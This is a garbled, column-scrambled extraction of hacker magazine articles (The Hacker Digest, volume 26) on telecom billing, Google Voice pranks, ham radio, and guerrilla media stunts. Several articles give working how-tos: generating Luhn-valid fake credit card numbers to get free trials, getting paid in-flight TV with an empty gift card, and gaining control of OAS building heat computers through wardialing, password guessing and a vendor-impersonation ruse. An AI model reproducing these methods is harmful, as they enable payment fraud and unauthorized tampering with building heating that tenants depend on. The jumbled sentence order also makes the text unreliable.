VoIP providers do not support this billing type.99 operator surcharge. carriers use the premium SMS platform for billing (I have written about this topic previously).59 per minute + 12. it’s a rapidly dwindling criteria). Assuming that this criteria is met (and believe me. AT&T will third-party bill calls without verification provided that a LIDB lookup indicates the line can be billed (or the LIDB lookup fails. only fixed-line residential and business numbers can be billed for such calls. It’s worth noting that CLEC. In the meantime. It can be fun finding out which services are offered. at which time you dial 0. which happens occasionally). The traditional way to call collect (from either a fortress phone or a POTS line) is to dial 0 plus the area code and phone number you’re calling.VOLUME 26
to pay for your calls! Time and Charges: You can request that a call be placed with “time and charges. a Line Information Database (LIDB) lookup is processed on the back end to determine whether the number you are calling is authorized for billing. 10 cents per minute plus a $2. but will inform the called party that you are trying to reach them. independent. and T-Mobile post-paid accounts. The operator will then dial the number you are billing and will ask if the charges are authorized. • 1-800-CALL4LES(S): $3. Muddying the picture further are toll-free “dialaround” services such as 1-800-FAIRCALL and 1-800-COLLECT. you’ll be connected to the number you’re calling. • Qwest 0+: For intraLATA calls in Washington State. $1. mobile phone. If it’s a collect call.99 for up to 20 minutes. so it’s time to rake my lawn again and bring this issue of “The Telecom Informer” to a close. and how accurate the billing is. Back to my pitiful neighbor and the collect call he’ll be making to his parents. For example.” The operator will place the call with the type and billing you direct. or billed to a calling card.9 percent USF plus tax. you’ll be connected to the number you’re billing.9% percent plus tax. which are completely unregulated. except to the disabled. AT&T simply eats the loss and blacklists the originating number for future unverified third-party billed calls. If you’re calling collect or billing a third number. Busy Line Interrupt: If you claim there is an emergency and agree to pay a fee for the service. an operator will come back on the line to say how long you talked and how much the call cost. In general. Where they do so. and competitive long distance carriers are not generally required to offer operator services. you’ll be asked for your name.50 surcharge and the rate is $1. consumer complaints are rampant about charges exceeding $5 per minute for collect calls.49 surcharge. Even today. your call will be connected. Either an operator or (as is usually the case these days) an automated operator will ask you what type of call you are making: collect. If it’s a third-party billed call. 50 cents to connect and 45 cents per minute. If you’re calling a landline using 1-800-CALL-ATT. if the charges are again disputed. 25 cents per minute flat.

Link a pizza place.
130
. For outgoing dialing. Many Apple Stores have iPhones on display and active for calls by anyone who walks up. Huh? This is Pizza Hut. anyone calling your Google Voice number will automatically ring all of your linked phones. There are many opportunities here for those wishing to enhance voice communication offerings. Thanks Google! *One way that Google may be able to stop this.VOLUME 26
by Faz and caphrim007
GrandCentral. then input a number to call. and pizza parlor (“Hello. or to simply have fun: 1. link them in your Google Voice number then publish it to the web as free Microsoft Support. you can the abuse the on-the-fly conference feature.
3. Initiate a call between an evil hacker and the FBI. work phone. This will force you to be present at the phones you list. Link these numbers to your Google Voice number and initiate a call between them for free.
2. even though you may be talking from your cell phone. This action then rings your selected number. pay-as-you-go phone. With Google Voice. to make free calls. You can link your home phone.THE HACKER DIGEST . Nothing more. As an added bonus. this is not required. then rings the remote number and connects the two. Domino’s. review past issues of 2600). “Hello. establish a call from another external party (Domino’s) to your Google Voice number and conference them in while they are ringing. or at least limit the scope of misuse. No I didn’t. initiate a call between the linked iPhones and Verizon tech support!
The drawback to the above is that you cannot listen in on the fun. That’s it. if you have two Google Voice accounts. a beta offering that was available through invitation only. It is trivial to obtain phone numbers from payphones (if you don’t know how.google. Anyone who calls the Google Voice number will automatically ring all the representatives’ phones. is to immediately ring the phone numbers that you add to your Google Voice number and prompt you to input a security code. you simply input the phone numbers you wish to be rung when a call comes into your Google Voice number. cell phone.com/voice) is. Faz? There is no Faz here. you called me. There is no validation of the phone numbers you link to your Google Voice number! That is. why are you calling me? I didn’t. and. You now have a 3-way conference call! The list of potential (mis)use* is endless. Mario’s Pizza. and your Google Voice phone number will show up in the CallerID. Simply establish a call between one of your phones and an external party (Pizza Hut). 5.” Make free calls from pay phones. then place a call through Google Voice to another pizza place. Link all your state representatives’ phone numbers (be sure to include personal and cell if you have them!) to a single Google Voice number and publish to the web. as of this writing. girlfriend’s phone. though it appears the service will become more public in the near future. You can also initiate dialing from one of your linked phones in the Voice web interface to another phone number. Now comes the fun part.”) to your Google Voice number via the web interface. By linking your phone numbers to the selected Google Voice phone number. Get the phone numbers. like all Google services. now known as Google Voice (http://www.
4. you select the phone from your list. at the same time and using a different account. However. This is great for covert meet ups. you can choose a phone number and then link all of your phones to this main number to help maintain your privacy (by not giving out your personal phone numbers) and to promote a ‘follow my phone’ type offering. But.

it’s amateur radio operators who are first to get on the air to coordinate relief efforts. Many times. General. You’re going to need a bunker deep inside a mountain. but on doomsday. Could doomsday be triggered by a shift in the magnetic poles. You will need some form of communication.org/to see when they are having exams in your area. FM. A Technician class license is the first one you get and has the most restrictions on amateur bands. watch all the apocalyptic and zombie movies ever made. the Internet will be severely crippled. “Am I ready?” If the apocalypse happens in 2012 you don’t want to be caught with your pants down. Getting a scanner may not be good enough. Look up ARES or RACES for more info. It’s a type of radio that can be connected to your computer via USB. P. Go to http://arrl. Armstrong jp@hackmiami. It’s more than likely that doomsday is not December 21.org
December 21. You’ll need to be prepared. Extra class licenses have the least restrictions. shortwave. BSoDTV. GMRS. Transatlantic telecommunication cables may very well be destroyed. you and other radio operators can set up bulletin board system (BBS) style nets with the help of software-defined radios. and for that you’ll need to get an amateur radio license. That’s why it’s good to have an amateur radio! Many ham radios act like scanners. 2012. AM. Sure it’s unlocked for use on any service provider. or all three exams for only $14.THE HACKER DIGEST . For more info on amateur radio check out: http://hackmiami.VOLUME 26
Po s t . For the rest of the survival guide. there are three types of license classes: Technician. filters. FRS. You’ve watched the movies and now you must prepare for the worst. and Extra. and packet sniffing. you can write custom code to do spectrum analyzing. you’re going to need to practice. Shout-outs: Ed. Look for “wide receive” feature. CB. That pwned iPhone just won’t do. I suggest watching those movies. 2012 is just around the corner. So you can listen to different frequencies like airband. They no longer test for Morse code. or perhaps some unstoppable airborne virus? Who knows! Either way you have to ask yourself. In the US. and the HACKMIAMI crew!
131
. amateur bands and your local Mickie D’s drive-thru. two. and you have a ham radio. Including the foreign ones! You don’t want to be one of the few humans left not knowing what to do. consider yourself covered (at least on the communications side). Consider getting a software-defined radio. To prepare to communicate after doomsday. modulation/ demodulation. A supposed cataclysmic event is to happen that day. HDTV tuning. Just imagine thousands of people across the country setting up a makeshift communications infrastructure to prepare themselves for an actual emergency. fire & rescue. It’s usually the last weekend of June. Field Days gives hams an opportunity to go outside and test out their emergency radio equipment. it’s more than likely that you won’t be getting any reception. First things first. With the help of GNU Radio. but if it is.Take one. Once human tribes have been established.org/wiki/Ham_ ➥Radio. preferably at high elevation–if it’s not magnetic poles shifting it will be global warming that takes us out.A p o c a ly p t i c
Communications
by J. Many local amateur radio clubs in the US have an annual Field Day. police. Maybe after doomsday.

and Google Reader. Plus.com/ ➥WoWInsider) to Bacon-lovers (http://
➥twitter. Obviously. By lurking. processed. however. Maybe that’s how you find out who hangs out at your favorite local places when you’re looking for new friends. Of course.
132
. others join in that you’ve probably never met and might never meet in your lifetime. Twitter accounts. though? I’m interested in security. It will refine. you can leverage microblogging services like Twitter to find and follow likeminded strangers. This collective will give input on ideas from within itself. Eventually. disprove. Facebook profiles. similar interests.000 foot view of your online social sphere. self-described social media addicts have no problem finding their cliques. and pretty soon you end up with a news-feed of data you’re interested in. or validate answers given to questions within the collective. The people you follow will frequently ask or answer questions of other folks.net
There’s no doubt that social networking is all the rage on the Internet these days. Friendfeed can aggregate most content from your other social network accounts. Maybe that’s where you keep all of your professional contacts or hunt for job opportunities. Facebook and MySpace are far too cumbersome and broad-sweeping in their content to be used efficiently. quite a few security geeks have blogs. Digg. won’t immediately integrate you into the hive. like Twitter on steroids. you just like to compete in the popularity contest to see how many e-friends you can collect. online. Maybe. I’ve found that this hive-mind functionality works best on lightweight services like the aforementioned Twitter. you need to establish your presence with relevant content that’s equally as interesting to them as their content is to you. Brightkite is a location-aware microblog with photo hosting ability.THE HACKER DIGEST . Maybe that’s where you go to get your 50. Assuming enough of them follow you back. Instead of just looking for your existing friends online. You can follow them as well. or simply because they’re a friend of a friend (of a friend of a friend). most of the services I mentioned have easy-to-use RSS feeds that can be indexed. and the like. Your reasons for befriending them may be many: interesting photos or content. and I’ve found that. It will challenge you to participate by giving as much as you get. you can learn a lot. What if you wanted to craft a specialized hive-mind.VOLUME 26
Roll Your Own Hive-Mind
by ax0n ax0n@h-i-r. for example. or with link-sharing tools like Delicious. Security nerds like me have SecurityTwits (http:// ➥twitter. Places like MySpace and Facebook have become ubiquitous social hubs that start out as a circle of your real-life friends. Jumping onto Twitter and following every single member of SecurityTwits. if you want people in your niche to acknowledge your existence on these social networks. It will link to fascinating content elsewhere on the web that other members might not otherwise find. aggregated.com/securitytwits). you will have a powerful hivemind at your fingertips. and searched later. LinkedIn has a business focus.com/bacontwits) can find a niche in most social networks. but everyone from World of Warcraft Gamers (http://twitter.

a message comes up telling you to stick your credit card in the slot if you want to continue watching.THE HACKER DIGEST . Then I remembered that I’d been carrying around an old American Express gift card. Not bad for a discount airline. They must not whip their employees like the other carriers. as well as a standard stereo headphone jack.VOLUME 26
by Outlawyr
First. Mrs. Earplugs are free. Movies are $8. why clog the airways with more transmissions? After swiping the card I was told to press the up channel button to confirm. The airline is in Chapter 11. Or DirecTV. figuring that they don’t process the credit cards while in flight. but one can always play dumb. I’d love to hear from you.shtml Frontier Airlines http://www. I had access to all channels. I then turned the brightness all the way down. After all.com/ ➥frontier/home. If anyone has some insight. The one I had was originally worth $100. so the balance was $0. At first. but has actually started turning a profit as of November 2008. But this left me time to ponder how one might hack the system and watch for free. I tried playing with various button combinations. however. Frugal man that I am. How was I to know what the balance was on the card? And. on to the show. These cards look and function like a credit card. Since I always carry my zero value gift card with me. Satellite TV is $5.
• • American Express gift card http:// ➥www. but have a predetermined amount on them when purchased. they know who is sitting in what seat on the airplane. the screen goes black.com/ ➥gift/giftcardslanding. but after the initial teaser phase when you can channel surf at will. and there are 3 to choose from. On your arm rest you have controls for volume. this gift card isn’t traceable to an individual. including the 3 movies. because there really was nothing interesting on. If you turn brightness all the way down. This. Anyway. the usual disclaimer: Don’t do the crime if you can’t do the time. like magic. a broadcast satellite service controlled by Liberty Media. this was all in the name of science. we wouldn’t even have airplanes. serve my purpose of killing some time while stuck in a tiny little seat. Unlike a credit card. I recently flew on Frontier Airlines for the first time. leads one to ponder what other situations require a credit card but don’t actually run the card at the time of purchase.
Of course.americanexpress. and then. every seat has its own little TV screen with DirecTV. but this got me nowhere. Or gift cards. but I’d used it all. I’m sure I’ll get a chance to test it out in the future (without breaking any laws of course). Don’t do it! And now. I resisted the urge to give up my hard earned money for a couple hours of television. Solving this little puzzle did.do
Resources
Shoutout to my lady. of course. so perhaps that accounts for the cheerful disposition. If it wasn’t for science.99. but rather wait until thvey land. channel and brightness. ➥frontierairlines. Thanks science! So I swiped my gift card in the credit card slot. Outlawyr!
133
.

which is not divisible by 10.Visa 5 . if not most. the following information is intended for informational purposes only. we change the check digit from 3 to 6. and I’m happy to circumvent it if I can.Discover I used this method a while back to obtain a free trial from http://www. While this information is already widely available to anyone who wishes to find it. Fortunately. there’s the small chance I could have just gotten lucky and found someone’s real number. but it’s easy enough to include this digit. Add up all sixteen numbers.THE HACKER DIGEST . Our valid number is now 4264 1658 2275 1396. of the new numbers and the original even numbers.American Express 4 . You should now have 16
numbers consisting. This identifies the number as a Visa number. please follow the golden rule and don’t do anything you wouldn’t want done to you. I fear what you might be doing with them. some. say 4264 1658 2275 1393. There is no good reason for them to have my credit card number if the free trial is really free. 2. Manipulate the check digit so that the sum is divisible by 10. my opinion is that this is bad business practice. add those digits together to produce a single-digit number. ➥com/. so I cancelled before the trial period ended. Starting with the first digit. Of course. If doubling a number results in a twodigit number. After doubling the odd digits and summing the ones that end up being two digits.MasterCard 6 . Replace the odd digits with the new ones just created. However.realtytrac. as an example. So. The sum of these digits is 67. 4. their plan is to start billing you if you don’t cancel within the trial period. let’s use a random number. Many of the readers here probably know that credit card numbers are generated using something a “Luhn check. It would be a no-brainer to write a script to spit out millions of valid numbers. 5. The credit card companies actually use a slightly modified version of this algorithm that involves a check digit. I get really frustrated sometimes when a website advertises a limited “free trial” and then asks for my credit card information. 3.VOLUME 26
Free Trials
Avoid Giving out Your Credit Card Number
by hostileapostle
First of all.
134
. So.” A Luhn check is a very simple algorithm which doubles the odd digits and does a sum to see if the number is divisible by 10. This is the very last digit of the credit card number. Of course. One other thing I did here was I made sure the first digit was 4. here are the steps to produce a number that will pass the Luhn check on a 16-digit card number: 1. Hope this helps you get some free trials. but if you need that many. as a disclaimer. of these web sites will not check to see if the number is real. With that said. just in case. we get 8234 2618 4255 2393. double every other number. Here are the numbers for the major credit card companies: 3 . to fix this. Whether that is really somebody’s card number is anyone’s guess. I don’t know how picky the different websites are. They will only check to see if it is valid.

combine the pulse inputs to a single. One may write “VERSION NOTES” in with the second-to-last
Sub-menu Notes
Selection of any one of these will open a sub-menu of options followed by a question mark. which activates the burner–it only permits the user to switch the monitoring of burner on and malfunction signals on or off. however. requires some explanation. “redial” to the screen. “STEAM/HYDRONIC?” is only useful on the single model of heat computers that may be used for steam or hydronic systems. I would recommend that the interested hacker also visit the seminar. although it is likely that they exist and are given to customers at the brief seminar that is recommended for all new OAS owners to attend.VOLUME 26
Understanding OAS Heat Computers
STEAM/HYDRONIC? BURNER SIGNAL? VERSION NOTES? PASSWORD?
The next option in the menu of commands is perhaps the most exciting. Passwords do not echo to the terminal. 2. Passwords are ten characters in maximum length. At “SENSORS?” one may manipulate privileges of the apartment temperature sensors (priority) and turn the outside temperature and aquastat sensors on and off. If a <CR> is pressed without an alteration in value the next option in the submenu will be displayed. ESC is used to exit from programming mode altogether (upon which a password need not be supplied to reenter during the session). No features that log invalid password attempts are documented.
THE HACKER DIGEST . To navigate through the sub-menus without programming. Sensor and meter labels refer to the headings that denote the thermistors and water meter in the current report “R. If an invalid value is entered. set points as seen in the ‘S’ mode. When a correct password is entered a main menu of four options will appear. as it increases the potential to learn about the system by way of practical application.U’MOu@. DATE SET POINTS MISCELLANEOUS DIALOUT
In order to program any of the options in any sub-menu. an attribute revealed by the audible bell (Control-G character) heard when an eleventh character is entered–this bell will also sound at the MODE: prompt when input in excess of the expected is entered. specify a scale factor for the flow rate. the OAS will output the directive.” ‘METERS?” provides the options to turn the water meters on and off. As is the case with the main ‘MODE:’ menu. date. will set the system in a heat call for one hour if the override value is entered–it may be interrupted at any time during the cycle and turned off. and dialout numbers/ alarm conditions is accomplished here. and to turn the water records on and off. The programming option is used to set every consequential element of the system from time set points to hardware handling. spew a line of garbage text. 4. the following options may be displayed in the “MISCELLANEOUS” submenu 3:
OVERIDE/NORMAL? SENSORS? SENSOR LABELS? METERS? METER LABELS?
135
. For example. If one is truly determined to know the password. input the desired value followed by a carriage return <CR>. Sub-menus 1. “BURNER SIGNAL?” does not control the burner control signal. The first option. The four main options are as follows:
1. 3. simply press ENTER at the option prompts. “INVALID ?=HELP” will be printed. The “MISCELLANEOUS” sub-menu. Pressing ‘P’ at the prompt will result in the following sub-prompt for a password:
PASSWORD:
Programming the System
If an invalid password is entered twice.D+-LS NO CARRIER
Defaults for this are unknown. OVERIDE/NORMAL. and BACKSPACE cancels an entire line of input. controlling reporting options. double-headed meter.2. and 4 are straightforward– programming of the clock. CLOCK. returning the system to ‘normal’ operation. and disconnect the user:
PASSWORD: INVALID REDIAL 4_QKvhbhC\v5(ij%Tudy%!#`&X ➥WJd. typing a question mark will display all of the potential values for a programmable option.Hack the Computers!
o Part Tw by The Philosopher
If You Can’t Stand the Heat.

. specifically the process of water circulation. Only ordinary heat and domestic hot water calls are seen above. coupled with the CNAM data of the dialup (backspoofing. Recall the operation of hydronic boilers. date installed/configured. “L” will redisplay the message first seen in the banner immediately upon connection to the system and “V” for Version will print a message similar to the following. To conclude descriptions of all commands. however. supply temperature refers to the temperature of water as it exits the boiler to circulate around the space that it is heating. phoning the legitimate operator at a number listed under ‘Set points’ (Mode S) and leaving a message with a voicemail number with a greeting identifying it as belonging to ‘Optimum Applied Systems. “Water Records” and “More Hourly Records” should reveal with ease the general specifications of the OAS. Incorporated’. and return temperature to that of the water as it returns to the boiler. it is important to retain a knowledge of their workings. Do note. and dial-out phone numbers. address.10 NOV 1995 On/Off System 8 SENSOR UNITAT
This confirms the previous suggestion to the effect that this is a steam system. accessed by the command. or “more hourly records” were not seen on this system at all and are probably boiler-specific. Quite simply. but flame failures. will likely prove extremely useful in either social engineering to obtain the programming password or guessing it in order to further one’s exploration of the heat computer. type of system and number of sensors:
MODE: V V 6310 . overrides. “E” are entirely separate from the initial report. This information. anyone?). with the version. information potentially useful in the attainment of the password and in programming of the settings. as steam systems are also known as ON/OFF or HI/LO fire boilers. that the dialup or IP might be particularly difficult to obtain as the actual operator of the
Footprinting the System A Review/Additional Tips on Obtaining the Password
137
. D2.” and so forth. Water records were also absent from this log. and D3 are available. strongly suggesting that this is a steam system. The only practical reason for offering all of the records as individual segments is that of specificity in monitoring. although some events may be recorded there without the time of their occurrence:
MODE: E
8:27P 8:21P 7:50P 7:46P 7:04P 6:59P 6:05P 6:01P 5:35P 5:30P 4:49P 4:44P 4:00P 3:56P 2:54P 2:49P 2:15P 2:10P 1:29P 1:24P 12:21P OFF ON DHW OFF ON DHW OFF ON DHW OFF ON DHW OFF ON DHW OFF ON DHW OFF ON DHW OFF ON DHW OFF ON DHW OFF ON DHW OFF 12:16P 11:47A 11:42A 11:10A 11:05A 9:15A 9:15A 8:20A 8:19A 7:06A 7:06A 5:31A 5:30A 4:34A 4:29A 3:04A 2:59A 1:15A 1:10A 12:00M 12:00M ON DHW OFF ON DHW OFF ON DHW OFF HEAT OFF 9:16P ON HEAT CALL OFF HEAT OFF 7:16P ON HEAT CALL OFF ON DHW OFF ON DHW OFF ON DHW OFF ----11:56P 11:00P 10:55P 10:05P 10:00P 9:20P ON DHW 8:09P 8:04P 7:22P ON DHW 6:38P 6:33P 5:59P 5:54P 5:03P 4:58P 4:18P 4:13P 3:23P 3:18P ON DHW OFF ON DHW OFF ON DHW OFF 12:04P OFF ON DHW OFF 9:56A OFF ON DHW OFF ON DHW OFF ON DHW OFF ON DHW OFF ON DHW 2:51P 2:47P 1:52P 1:47P 1:00P 12:55P OFF 12:00N 11:17A 11:12A OFF 9:56A 9:00A 8:59A 7:50A 7:50A 5:31A 5:30A 5:07A 5:03A 3:39A OFF ON DHW OFF ON DHW OFF ON DHW ON DHW OFF ON DHW HEAT OFF ON HEAT CALL OFF HEAT OFF ON HEAT CALL OFF ON DHW OFF
This is a record of every burner on/off cycle for the past 84 events. D1. the entire system is designed to facilitate great discretion in what one views during a particular session. As is evident by the redundancy present in several of the options. and as such we need to perform diagnostic tests on the system as a part of your warranty. perhaps containing records such as the supply and return temperature that are only required on hydronic systems.. accompanied by a statement to the effect that “Your heat computer has reached its ___ year point. information universal to all types of heat computers that manage such boilers. Since some of the systems that one may hack might control hydronic boilers. One aspiring to program the OAS could also potentially attempt the age-old callback ruse. Commands such as “Version”. If one wishes to view a complete list of all of the records for a particular day in the past three days at the entry of a single command. XD 1-3. Events. bypasses and power failures may also be logged here depending upon the version.VOLUME 26
This unit displayed this for every date up to June 10.THE HACKER DIGEST .
Several ways exist through which information pertaining to the system may be acquired.

exe file. Wardialing metropolitan prefixes is also bound to turn up heat computers. Remember. it is doubtful that it will be greatly protected. etc. unfortunately. while it may contain special characters. While connecting to the OAS heat computer via a terminal client and manually entering all of the commands might be satisfactory for some. it is. thus rendering impersonation of him or her absolutely useless. In any case. at http://www. especially since no evidence or mention is made or available anywhere of logging failed attempts. The programming password is not echoed to terminal or screen.” Extract and copy all of these files to the desktop or other location where the entire installation process will take place (the desktop is recommended for the sake of convenience).oas-inc.96 is now installed. the ten-character password is likely to be vulnerable to a dictionary attack of words containing ten characters or less. an absurd assumption as it clearly identifies itself as an archive under “properties. all of these files in the archive may be freely copied. Instruct the software to place an icon for Master95 onto the desktop when prompted to do so. beginning with ‘data1.EXE (it should be the eighth file in the list). while downloadable.
The Software . Although such incidents are certainly rare. Although the version 6310 does not support this. Run SETUP. and it has several useful utilities intended clearly for administration. this is simply another instance of security through obscurity. Ignore that for the moment and open the archive in the archive management software of your choice–the author personally recommends WinRAR. there will be people who are either ignorant or abusive of it.VOLUME 26
system would logically be the only individual in possession of such information. The author is not aware of any additional features that may lie behind that password prompt–it may be reasonably assumed that none exist since the software itself is clearly labeled as the “Full Version” when “About” is selected. If the reader will forgive the sudden launch into linear. proving once again that knowledge regarding any type of technology that controls one’s life is always of use to nearly anyone with any motives. remember. though. if you can’t stand the heat. It comes in a strange archive format unknown to the WinRAR archive software.THE HACKER DIGEST . unnecessary to enter the programming menu once it has been entered at the initial prompt. the following will explain the installation process.EX_. OAS skills would be infinitely useful in the face of their occurrence. get out of the kitchen and into the OAS! All of the above is merely the beginning.cab’ and ending with “_INST32I. If so. As a side note. although the best method as of yet seems to be a simple matter of wardialing the exchange controlled by the company that owns the OAS (in the case of large corporations with inclusive PBXs) or dialing around the phone numbers of the building in which it is likely to be located (with small businesses). click “Finish” and run the software by doubleclicking on the desktop icon. Upon reaching the end of the InstallShield Wizard (the application that guides you through the setup process). If you attempt to open/run it as you would any other .exe file.EXE”. Does that text in the background of the window with the copyright and version appear at all familiar?) and proceed through all of the prompts-agree to the license. and the software should operate without any difficulty if all of them are located in the same directory. A list of 16 files should appear. This software.An Addition
138
. as OAS doesn’t seem particularly disposed toward the idea of amateur experimenters logging into heat computers and running commands. (presumably with the purpose of the confirmation of one’s status as a customer) lending credence to the notion that OAS does not intend for the public to have unhindered access to Master95 and that the password protection is a feeble form of security. however. the author of this article has heard of a few rumors of use of the OAS and similar heat computers by landlords to deny tenants heat in an quasi-extortive context or misuse resulting in active heating of a building in the summer or when the temperature outside is otherwise high. enabling one to “eavesdrop” and/or interfere with the session of the legitimate user. other versions may permit simultaneous logins and command execution in a single ‘session’. The full version of Master95 Master Dial Program Version 1. is called ‘Master95’ and can be quite somewhat of a kludge just to install. you will receive a window prompting you for a case-sensitive password of enormous maximum length. This is an incredibly useful enhancement to the pursuit of hacking OAS Heat Computers. Also.” with passwords absent.com/. Wherever advanced technology exists. redundant expository style and the informal shift into the second person. as it reveals several aspects otherwise hidden. OAS also offers software to automate and enhance the process of heat computer maintenance (whether it is authorized or not). The OAS website also declares that the software. Creative ways to get the dialup may be devised. possibly of the OAS brand. must be registered over the phone before use. “STUB. called an “SFX CAB Archive” as a . available on the OAS website for all to download. by doubleclicking on the icon (it doesn’t run in DOS mode). assuming that one will not attempt to open it with archive software.

. and may produce erratic results on other models. XR. while I most certainly do not condone exaggeration of the problem. but it does reveal a few interesting things. DOS versions of Master software with the file option. revealing the aforementioned fact that passwords are ten characters long. all of this is definitely something to ponder as these systems begin to make their way onto the Internet.” Building lists may also be imported from older. “Import Old List.THE HACKER DIGEST . and proceed to correct it upon learning the password! A simple understanding of human nature suggests that people will be much more susceptible to social engineering. displays the report and alters it in real-time. One could even carry this social engineering scheme so far as to call up the building owner/manager with an actual problem visible in the report. Master95 also serves as an effective organizational tool for heat computer management. however. setting the type of unit (Heat. is frankly unwise. and store the output in a file with the extension . The password box only accepts ten characters. the Master95 software appears to merely be an alternate way to access heat computers and administer them using a GUI and menu system. RA and RB will not work on this particular model/type of heat computer at all.N.” The following banner demonstrates the general format and appearance of tank computers. Upon establishing a connection to a heat computer through the software. Daily/ single collection is a slightly more complex automation. Editing the properties of a particular building in this list entails the assignment of an ID. OAS is extremely zealous in advertising. other OAS products controllable over modem are listed– a mildly interesting bit of information. Perhaps it would be lucrative to watch wardial logs for anything mentioning a “tank computer” or a “fire eye. not documented in the list provided with a “?”! While in most cases the two reports may be identical. This is a hidden command. a display of the constantly fluctuating temperature of the area surrounding thermistors. the Internet. for instance. although it completely lacks explanation useful to an outsider (unauthorized user. etc. The latter two are simply an automation of the programming set points process for the summer/winter option and time. the attainment of the dialup to a heat computer can lead to the address of the unit and possible numbers at which the owners/ operators may be contacted. a slight discrepancy may be seen between them. if one prefers a GUI. recently. 1993 TANK CAPACITY: 5000 GALLONS
Fire Eye). and so forth. And. and clock programming. in which the user may program the software to dial selected buildings in the list at a specified time and day. the baud at which it connects. select “Setup Parameters” under the “Tools” menu. one will notice that. an assigned ID. under “Commands” sent by the keyboard shortcut Alt+R.” “Tools” for building lists include daily and single collection. when faced with a potential disaster such as complete cutoff of heat in the dead of winter. i. While manufacturers of some devices
Conclusion-Thoughts on Security
These connect at 8. The problem as here present insofar as security is primarily that a very limited amount of seemingly innocuous information can lead to extremely specific information useful in penetrating and taking complete control of specific units. Heat 7000. Observing the window. for “collection summary. leaving such systems that control heat to an entire building lying about on the PSTN and. event log. or using the drop-down menu system.VOLUME 26
the directory in which it is run.e. such as oil:
OAS Tank Gauge 145 ATLANTIC STREET 4:30P Sat Dec 17. or even something minor such as a small water leak or a dirty coil. Notice the command “Real Time Display”. or
139
. a difficulty only repairable by remote programming. under the “direct dial” option when the option “building list” is selected.” To configure these parameters. hacker) such as explanations of ultimate application to heat and descriptions of boiler operation. and dialup. Oil Tank. RB. summer/winter programming. which presents in a succinct format all the descriptions of the current report. that is. While in some regards OAS can hardly be blamed for certain aspects of the nature of heat computers that render them so incredibly predisposed to control by outsiders–attributes such as the remote accessibility over phone lines. much more willing to give out the programming password. which are used to monitor liquid inside of tanks. Of foremost interest to the reader may be the commands help file. Selection of this during a session will pull up a “Command Select” box. Tank computers are a subject for another article. un-passworded execution of seemingly harmless commands.1 as the heat computer text does not display properly when a heat computer is dialed and either option is selected. At first glance. with four commands listed that accomplish this-R RA.sum. execute commands. providing details as to the technical specifications of models sold in numerous public releases. incorporating into its array of utilities a building list in which heat computers (and the other types of systems) may be sorted based upon address. and XR. one may enter commands manually in the blue terminal window in which all output is viewed. as it assumes that the software user will be trained in such matters. and the “port switch.

com/. although conjecture and speculation is labeled as such. the curious hacker reading this article should happen to find an OAS Heat Computer. #telephreak. Binrev and the DDP.org/ ➥archive/hem.anl. From an explorer’s standpoint. and OAS for manufacturing such interesting. Substance. the thought that an individual in a remote location could with relative ease (here it is important to remember that while OAS Heat Computers may be uncommon.telephreak. and #telephony. potential unintended uses for the various options therein.dis. in the true spirit of hacking.org. as a matter of course. Redundancy here (presentation of details present in the help file of the Master95 software and so forth) exists in order to provide readers with a reference that may be used both as a quick guide to heat computers without the help file or the official manuals. Slight details are available in the help file of Master95 and elsewhere that are not mentioned here–get the software!
140
. other heat computers and building maintenance systems exist in abundance. ThoughtPhreaker. and other pictures of the front panel are available on http://www. everyone in #telephony.gov/eehem/ ➥picts/97054101. please forgive me with the assurance that your contributions and the general benefits of our interactions do not go unnoticed and underemphasized. I advise him or her to align subsequent actions with the Hacker Ethic. If I have forgotten or omitted anyone else. and vulnerable products. to this end I encourage the use of the letters section of 2600 as a public forum to further knowledge upon this topic. useful.gif.VOLUME 26
have realized the folly of unnecessary remote access. bomberman2525. on the Telephreak BBS at telnet://bbs. radio_phreak. especially in large cities) direct the equipment that administers heat and water to a large building is slightly disturbing. If.com with any questions or input.oas-inc.THE HACKER DIGEST .homeenergy. DCFlux. and as such is not all-inclusive by any means. Although it was extensively researched. A grayscale photograph of an OAS Heat Computer unit is available at the time of this writing on http://www. I would like to hear from you. heat and building automation systems are likely to become even more accessible in the future. I may be contacted on IRC on 2600net in #2600. whitehorse. for evident reasons of expediency. by any stroke of fortune. as well as an explanation of. I authored this article strictly from the perspective of an outside hacker experimenting with the system-a good deal of information presented here was garnered from experimentation and observation. If anyone should happen to possess a superior command of such systems as were discussed in this article. Still. the broad class of people who ever wrote anything that contributed to my underground knowledge base. the anonymous person who posted the logs that initially brought heat computers to my attention. to refrain from actuating the causation of any permanent or immediately serious problems with the system either unintentionally (as preposterous as that may sound) or intentionally. Shoutouts to rev. heat computers of all types provide a relatively safe venue through which a fairly extensive assortment of technologies may be studied–boilers are nearly as complex and interesting as phone systems or any one of the other self-contained networks of mechanical and electronic parts that comprise the modern world. or at my email address: philosopher2600@ ➥gmail.

like the working class and . You could. Guerrilla communication exists to fight the media system and the reality produced by this system. or sex. Some guerrilla communication theories may take left-wing or Marxist positions in regards to the social factors underlying and forming a society.” one of the biggest art fairs in North America.VOLUME 26
141
.the networking class. spread business cards. for example. heuristic power in the modern world. It also suggests that media defines and preserves the status quo. Capitalism is a totalitarian doctrine whose very structure. it still remains within the construct of “good” capitalism versus its evil twin “bad” capitalism. It is inspired by various theorievs on social communication and includes positions that tend to focus merely on the government while excluding other factors from analysis. you have to hack the system.” to take control of and to modify their basic human needs and relationships. The word “guerrilla” suggests that there’s a war going on. Whoever controls the media controls everything. The status quo of a society in which knowledge and information are not only means of controlling people but also ways of segregating people into classes. And I am about to tell you what that is and how it works.” Günther was walking around the fair and did what every good businessman should do. and operating mode is considered to “alienate humans. freedom of speech and Twitter. purpose. we told all the people that we had to take Günther into custody and would have to dissolve his body in acid. Our press release stated that Günther Friesinger (a member of our group) was carrying a “rare.” Additionally. Publicity means to expose yourself and therefore you can be attacked. While this strategy is useful in pointing out the power of consumers. Never forget that there is no such thing as “good” or “bad” capitalism. Some years ago we used these techniques to stage a deadly virus outbreak at “Art Basel Miami Beach. creating a simplified portrait of social powers. were “contagious” and a small group in hazmaz outfits later tried “to retrieve and destroy the business cards he has spread. So what can be done about it? The classic guerrilla communication tactic is to launch small but effective attacks on an enemy which is much bigger but also hampered due to institutionalization. of course. my black-shirt-with-penguin-wearing friends. One that sucks.it is always owned by somebody. but highly contaigent subform of the Arad-II Virus (Onoviridae family). guerrilla communications aim to interfere in the monologue of bourgeois mainstream media and to show how reality and normality are defined through media control and access to public spaces. decide to boycott a product as long as it is advertised. of course. There’s no such thing as free media. all our so-called free media. And we wanted to create a statement about the disgusting networking and business aspects of the art market. There’s a wide range of strategies guerrilla communication could use. shake hands. But the business cards. it’s all bullshit. race. It was interesting to see how many people were 